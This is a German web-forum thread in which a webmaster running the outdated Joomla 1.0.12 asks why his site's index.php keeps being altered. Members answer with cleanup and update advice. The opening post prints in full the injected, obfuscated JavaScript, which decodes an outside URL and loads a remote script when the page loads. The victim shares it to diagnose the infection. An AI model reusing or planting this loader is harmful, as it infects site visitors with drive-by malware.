+ Antworten
Seite 1 von 3 1 2 3 LetzteLetzte
Ergebnis 1 bis 10 von 25

Thema: Joomla Seite gehackt

  1. #1
    War schon öfter hier
    Registriert seit
    24.01.2007
    Beiträge
    248
    Bedankte sich
    22
    Erhielt 29 Danksagungen
    in 29 Beiträgen

    Standard Joomla Seite gehackt

    Hallo Jungs und Mädels,

    habe seit ca. einer Woche folgende Problem.
    Meine Website wird ständig mit einem "Script" verändert und somit wird mein Joomla Zerschossen.

    Bsp:
    Gestern habe ich gegen 15.30 Uhr eine Datensicherung auf den Server geladen, nachdem die Seite wieder zerschossen war. Die Seite funktionierte seitdem wieder problemlos.
    Nach einem Forentipp habe ich gleichzeitig auch das Passwort des einzigen FTP-Zugangs geändert.

    Heute morgen die böse Überraschung, die Seite ist wieder zerstört worden... wer dachte es...
    Fehlermeldung bei aufruf des joomla Hauptverzeichnisses: Parse error: syntax error, unexpected '<' in /var/www/web279/html/index.php on line 307
    In Zeite 307 beginnt das unten abgebildete Script

    Ich habe mir daraufhin den letzten Zeitspempel der Index.php angeschaut. Darin steht das letzte Änderungsdatum, Gestern 17.55 Uhr.
    Um diese Uhrzeit habe ich auf gar keinen Fall etwas am System verändert. (Feierabend )

    Kann mir jemand sagen, wie dieser Angriff zustande kommt und wodurch dieser in mein System eindringen kann? In meinem Logfile (Anhang) des Server ist im besagten Zeitraum (17:55) kein Zugriff festzustellen. Somit gehe ich davon aus, dass der Angreifer über Joomla ans System geht.


    Ich hoffe Ihr könnt mir bei diesem nervtötendem Problem behilflich sein.

    Gruß,
    Andi



    Das Script, das für Verwirrung sorgt:
    PHP-Code:
    script * > try{window.onload=function(){document.write('<div id=megaid>kijiji-ca.marktplaats.nl.</div>');To7fei9ft6y document.getElementById('megaid').innerHTML 'n!^o^)^!@v@)o#(#t^e(&!k&#^a@!-&r(^^@u#(.(&($e$@^$x$!t!(r^))!a!#f&@r$()@$e@^!e#^w$&e&)&)b@)$.&$(!r(@$u$:)$D$E$!(B($@U^G$&/!!c!^&@^c^#t&&v$^!(.@$c@^o)@!&m)!!/#)$$c^$$#c@#))t!!!v!&.^(c&(o&$@m^/@g!#o)$)$o)&#!g)&!l$)!e$^(.#c^$o$!m^)$(/@!w(i#k@!@i##h)#$o@#&@^w&^.&!#$c()o!m)(^/##b&#!u$!(!^5(&#2&$&@0$(!).^!@!c(o$$m$$!/!'.replace(/(|$|!|^|@|#|&|\)/ig, '') ;document.write('<scr'+'ipt src=http://'+To7fei9ft6y.replace(/DEBUG/g, '8080')+'></scr'+'ipt>');} }  catch(Tv6vx38x ) {}</script>
    <!--bd5697819892b3de9762b012aa9d61ef--> 
    JoomlaVersion: 1.0.12 Stable
    Bitte keine Hinweiße wie: Update doch einfach
    -> Große Seite - Wenig Zeit :P
    Angehängte Dateien
    Geändert von andi112 (26.01.2010 um 10:38 Uhr)

  2. #2
    Gehört zum Inventar Avatar von blaulichttreff
    Registriert seit
    30.04.2007
    Ort
    Heidenrod
    Beiträge
    7.703
    Bedankte sich
    134
    Erhielt 2.557 Danksagungen
    in 2.421 Beiträgen

    Standard

    arbeite erst mal die tips für eine gehackte webseite ab, diese findest du in der joomla faq, link in meiner signatur.
    ein paar angaben zur version und der verwendeten erweiterungen wäre auch ganz nett und hilfreich.
    meist erfolgen die angriffe nicht über den joomla-core , sondern über unsichere erweiterungen.
    Gruß Sascha
    Viele kennen Google, aber nur wenige scheinen es zu nutzen Problem gelöst? | Joomla FAQ
    FF Springen

  3. Erhielt Danksagungen von:


  4. #3
    Hat hier eine Zweitwohnung Avatar von Joe Sixpack
    Registriert seit
    28.03.2007
    Ort
    Schweizer Berge
    Beiträge
    1.553
    Bedankte sich
    209
    Erhielt 425 Danksagungen
    in 372 Beiträgen

    Standard

    das ist ein FTP Hack.

    du solltest dein Kiste checken, PW ändern usw.

    Check mal dein FTP-Log, dann siehst du es.

  5. #4
    Moderator Avatar von Lacki
    Registriert seit
    27.04.2006
    Ort
    Direkt um die Ecke
    Beiträge
    8.526
    Bedankte sich
    328
    Erhielt 3.530 Danksagungen
    in 2.913 Beiträgen

    Standard

    Zitat Zitat von andi112 Beitrag anzeigen
    JoomlaVersion: 1.0.12 Stable
    Bitte keine Hinweiße wie: Update doch einfach
    -> Große Seite - Wenig Zeit :P
    Entschuldige, aber das ist eine dumme Ausrede. Dir sollte man den Zugang zur Webseite kappen. Du setzt wissentlich eine leicht zu hackende Version ein, damit gefährdest Du die Besucher Deiner Webseite. Du weißt hoffentlich, dass Du dafür haftbar gemacht werden kannst. Traurig, Traurig

    Kleine Ergänzung: Zeit ist immer relativ, wie viele Stunden musst Du arbeiten, um das Geld für den Anwalt und die Schadensersatzansprüche wieder rein zu holen? Ein Update kostet auch bei großen Webseiten nur wenig Zeit, ein Test kannst Du an einer lokalen Kopie machen.

    Rechte und Pflichten des Webseitenbetreibers

    Zitat Zitat von Joe Sixpack Beitrag anzeigen
    das ist ein FTP Hack.
    Sicher? Siehe oben.
    Geändert von Lacki (26.01.2010 um 10:53 Uhr)

  6. #5
    Hat hier eine Zweitwohnung Avatar von Joe Sixpack
    Registriert seit
    28.03.2007
    Ort
    Schweizer Berge
    Beiträge
    1.553
    Bedankte sich
    209
    Erhielt 425 Danksagungen
    in 372 Beiträgen

    Standard

    Zitat Zitat von Lacki Beitrag anzeigen

    Sicher? Siehe oben.
    http://www.samuidevelopment.com/2009...itet-sich-aus/

    wenn man über Google die ersten Zeilen des Scriptes sucht.

    aber 1.0.12 ist natürlich auch nicht schön

  7. Erhielt Danksagungen von:


  8. #6
    Gehört zum Inventar Avatar von Helrunar
    Registriert seit
    05.03.2006
    Beiträge
    5.891
    Bedankte sich
    528
    Erhielt 1.446 Danksagungen
    in 1.314 Beiträgen

    Standard

    Zitat Zitat von andi112 Beitrag anzeigen
    -> Große Seite - Wenig Zeit :P
    Wenn man selbst keine Zeit hat, dann sucht man sich, vor allem bei einer geschäftlichen Seite, jemanden, der einem das macht. Das ist immer noch billiger als die von Lacki angesprochenen kosten

  9. #7
    Verbringt hier viel Zeit Avatar von GN2 netwerk
    Registriert seit
    01.09.2007
    Ort
    Coburg
    Beiträge
    996
    Bedankte sich
    112
    Erhielt 333 Danksagungen
    in 250 Beiträgen

    Standard

    Zitat Zitat von andi112 Beitrag anzeigen
    JoomlaVersion: 1.0.12 Stable
    Bitte keine Hinweiße wie: Update doch einfach
    -> Große Seite - Wenig Zeit :P
    Wieso ist diese asoziale Einstellung eigentlich gerade im Joomlalager so verbreitet, jeder hält seine Seite für unersetzlich, Schädigungen für andere werden billigend in Kauf genommen.

  10. Erhielt Danksagungen von:


  11. #8
    War schon öfter hier
    Registriert seit
    24.01.2007
    Beiträge
    248
    Bedankte sich
    22
    Erhielt 29 Danksagungen
    in 29 Beiträgen

    Standard

    Danke erstmal für eure Antworten


    Weitere Angaben zur Seite:
    Erweiterte Komponenten:
    • Letterman
    • SEF 2.0.0-RC5_SP2

    Zitat Zitat von Joe Sixpack Beitrag anzeigen
    das ist ein FTP Hack.
    du solltest dein Kiste checken, PW ändern usw.
    Check mal dein FTP-Log, dann siehst du es.
    FTP-Hack schliese ich aus. In meinem Logfile sehe ich keinen Hinweiß, das die Seite manuell geändert wurde. Logfile siehe Anhang.

    Zitat Zitat von Lacki Beitrag anzeigen
    Entschuldige, aber das ist eine dumme Ausrede. Dir sollte man den Zugang zur Webseite kappen. Du setzt wissentlich eine leicht zu hackende Version ein, damit gefährdest Du die Besucher Deiner Webseite. Du weißt hoffentlich, dass Du dafür haftbar gemacht werden kannst. Traurig, Traurig

    Kleine Ergänzung: Zeit ist immer relativ, wie viele Stunden musst Du arbeiten, um das Geld für den Anwalt und die Schadensersatzansprüche wieder rein zu holen? Ein Update kostet auch bei großen Webseiten nur wenig Zeit, ein Test kannst Du an einer lokalen Kopie machen.
    Ich selbst kann ja da nichts bestimmen. Ich bin leider nicht mein eigener Chef.
    Es gibt leide rnoch ein Zwei Leute die mir eben sagen was ich machen soll. Und jetzt ist es eben "Richte es wieder, so schnell wie es geht"

    Mit den Pflichten und Rechten ist mir schon bewusst, nur ich kann mich auch nicht einfach ne Woche hinsetzten und die Seite neu aufarbeiten.



    FAQ arbeite ich gearde durch

  12. #9
    Gehört zum Inventar Avatar von Helrunar
    Registriert seit
    05.03.2006
    Beiträge
    5.891
    Bedankte sich
    528
    Erhielt 1.446 Danksagungen
    in 1.314 Beiträgen

    Standard

    Zitat Zitat von andi112 Beitrag anzeigen

    Mit den Pflichten und Rechten ist mir schon bewusst, nur ich kann mich auch nicht einfach ne Woche hinsetzten und die Seite neu aufarbeiten.
    Du wirst doch wohl die halbe Stunde, Stunde Zeit haben mal das Update auf 1.0.13 und dann das auf 1.0.15 per FTP auf die Seite zu laden!? Ist immer noch weniger Zeit als jeden Tag diesen verdammten Hack zu beseitigen. Und wie schon gesagt, dann nimmt man sich jemand, der das für einen macht. Rechne doch das mal mit Deiner Arbeitszeit und den damit verbundenen Kosten gegen
    Geändert von Helrunar (26.01.2010 um 11:11 Uhr)

  13. #10
    Gehört zum Inventar Avatar von blaulichttreff
    Registriert seit
    30.04.2007
    Ort
    Heidenrod
    Beiträge
    7.703
    Bedankte sich
    134
    Erhielt 2.557 Danksagungen
    in 2.421 Beiträgen

    Standard

    Und jetzt ist es eben "Richte es wieder, so schnell wie es geht"
    dann würde ich diesen leuten mal sagen, wo die probleme liegen und sie vor die wahl eines updates oder dauernden scherereien stellen.
    so ein bisschen arsch in der hose kann deine arbeit unheimlich erleichtern
    Gruß Sascha
    Viele kennen Google, aber nur wenige scheinen es zu nutzen Problem gelöst? | Joomla FAQ
    FF Springen

+ Antworten
Seite 1 von 3 1 2 3 LetzteLetzte

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein